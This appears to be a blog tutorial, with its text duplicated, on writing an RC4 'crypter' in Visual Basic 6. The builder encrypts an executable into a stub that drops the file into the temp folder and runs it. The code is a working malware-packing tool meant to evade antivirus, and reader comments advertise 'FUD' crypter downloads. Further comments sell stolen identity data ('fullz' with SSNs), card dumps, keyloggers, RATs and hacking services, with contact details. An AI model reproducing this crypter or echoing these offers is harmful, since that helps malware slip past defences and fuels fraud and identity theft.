ASALAM U ALLIKUM TO READERS
How To Make a crypter ?
How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain
The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.
TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion
1. Introduction
RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).
Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.
Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.
2. Building your crypter.
Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.
Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.
Code:
With commondlg 'CommonDialog1.
.Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
.DialogTitle = "Please select a executable file..." 'The title of the dialog.
.ShowOpen 'Show the dialog.
End With
TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.
The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.
Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.
Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.
Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.
MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.
Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.
For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.
Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!
Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.
Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.
sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.
Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.
End Sub 'This ends "Public Sub Main()".
The code will be teaching you. Once you're done, remove the Form1.
3. Conclusion .
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!
RC4 module : http://www.freevbcode.com/ShowCode.asp?ID=4398
RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).
Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.
Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.
2. Building your crypter.
Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.
Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.
Code:
With commondlg 'CommonDialog1.
.Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
.DialogTitle = "Please select a executable file..." 'The title of the dialog.
.ShowOpen 'Show the dialog.
End With
TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.
The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.
Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.
Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.
Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.
MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.
Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.
For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.
Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!
Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.
Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.
sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.
Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.
End Sub 'This ends "Public Sub Main()".
The code will be teaching you. Once you're done, remove the Form1.
3. Conclusion .
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!
RC4 module : http://www.freevbcode.com/ShowCode.asp?ID=4398
It’s really a cool and useful piece of info. I am glad that you shared this useful information with us.
Buy Crypter
Dragon Crypter-Fud Stub
http://crypterwar.blogspot.com/2016/01/dragon-crypter-fud-stub.html
onxyCrypter-fud crypter
http://crypterwar.blogspot.com/2016/01/onxycrypter-fud-crypter.html
Free FUD Crypter Collection
Free FUD Crypter Collection
Modern Crypter Source
http://lobatandawgs.com/crypter/21-modern-crypter-source.html
http://shanghaiblackgoons.com/24-modern-crypter-source.html
Fuzion Crypter v2
http://shanghaiblackgoons.com/23-fuzion-crypter-v2.html
http://lobatandawgs.com/crypter/20-fuzion-crypter-v2.html
Elm0D Crypter - 20+ Features - Complete Project + Stub
http://lobatandawgs.com/crypter/19-elm0d-crypter-20-features-complete-project-stub.html
http://shanghaiblackgoons.com/22-elm0d-crypter-20-features-complete-project-stub.html
Dragon Crypter [Builder + Stub]
http://lobatandawgs.com/crypter/18-dragon-crypter-builder-stub.html
http://shanghaiblackgoons.com/21-dragon-crypter-builder-stub.html
Delta Crypter V2 [Builder + Stub]
http://lobatandawgs.com/crypter/17-delta-crypter-v2-builder-stub.html
http://shanghaiblackgoons.com/20-delta-crypter-v2-builder-stub.html
CrypterMaster .NET
http://lobatandawgs.com/crypter/16-cryptermaster-net.html
http://shanghaiblackgoons.com/19-cryptermaster-net.html
ByteCrypt Binder Startup USG Spoof
http://lobatandawgs.com/crypter/15-bytecrypt-binder-startup-usg-spoof.html
http://shanghaiblackgoons.com/18-bytecrypt-binder-startup-usg-spoof.html
for more help contact me
yahoo:kbksrb@ymail.com
ICQ:682020867
Hello All
I'm offering following hacking services
..Western union Trf
..wire bank trf
..credit / debit cards
..Perfect Money / Bintcoing adders
..email hacking /tracing
..Mobile hacking / mobile spam
..hacking Tools
..Spamming Tools
..Scam pages
..spam tools scanners make your own tools
..Keyloggers+fud+xploits
Fake peoples have just words to scam peoples
they just cover their self that they are hacker
but when you ask them a questions they don't have answer
they don't have even knowledge what is hacking
am dealing with real peoples who interested and honest
also teaching hacking subjects in reasonable price
with private tools and proof.
Availability 24/7 contact only given below addresses
salvrosti@gmail.com
Icq: 718684828
Skype: live:Salvrosti
TOOLS&FULLZ SHOP
_______________
hi EveryonE!
Are you been stuck for looking valid products or been scammed by scammers :(
Here the Valid store available for all kind of tools,tutorials & Fullz with quality
Learn hacking and spamming and do it on your own way & enjoy..........
_______________
1)FRESHLY SPAMMED USA FULLZ
2)HACKING & SPAMMING TOOLS
3)TUTORIALS
_______________
*Contact*
*ICQ :748957107
*Telegram : @James307
*Skype : Jamesvince$
_______________
USA SSN FULLZ WITH ALL PERSONAL DATA+DL NUMBER
-FULLZ FOR PUA & SBA
-FULLZ FOR TAX REFUND
*fullz/lead with DL num
*SSN+DOB
*Premium info
ID's Photos For any state (back & front)
________________
+US cc Fullz
+(Dead Fullz)
+(Email leads with Password)
+(Dumps track 1 & 2 with pin and without pin)
+HACKING & CARDING TUTORIALS
+SMTP LINUX
+SAFE SOCK
+CPANEL
+RDPs
+Spamming Tutorial
+SERVER I.Ps
+EMAIL COMBO
+DUMPS TUTORIAL
+BTC FLASHER
+KEYLOGGER COMP&MOB
+EMAIL BOMBER
+SQLI INJECTOR
+ETHICAL HACKING TUTORIAL
+GMAIL HACKING TUTORIAL
+PENETRATION TESTING TUTORIAL
+PayPal Cracker
+BTC Cracker
+BLUE PRINTS BLOCKCHAIN
+EMAIL BLASTER
+SMS SENDER
+NORD VPN
+ONION LINKS AND TOR BROWSER (LATEST VERSION)
+DARK HORSE TROJAN
+NETFLIX CHECKER
+IP ROUTING
+KEYSTROKE LOGGER
+WESTERN UNION LOGINs
+ALI BABA IPs
+KEYLOGGER
+SHELL SCRIPTING
_______________
*Let's do a long term business with good profit
*Contact for more details & deal
*Contact*
*ICQ :748957107
*Telegram :@James307
*Skype : Jamesvince$
CONTACT DETAILS
75 28 22 04 0 = I*C*Q
Peeterhacks = Wickr/Skype
@killhacks = Te-le-gr-am
TOOLS WITH TUTORIALS & FULLZ/LEADS STORE
Legit STUFF will be given, found invalid will be replaced
Quick Service & Instant Response
Experienced guide provided
Let's Start
Spamming/Hacking/Carding/Cracking Stuff
Tools for every job
Tutorials will be included & provided
=Car-ding
=Spa-mming
=Hac-king
=Kali-Linux Master Class
=C-panles/Shells
=SMTP's/MAilers/RDP's
=Dorks/Brutes
=Key-logger/Viruses/RAT's
------ETC----------------
@leadsupplier -> T-ele-gram
752822040 -> I-C-Q
peeterhacks -> Wickr/Skype
-------------------------
High Credit Scores Fullz (700+)
CC with Cvv Fullz (vbv & non-vbv)
SSN+DOB/SSN+DOB+DL Fullz
FULLZ for SBA/PUA/Tax Return filling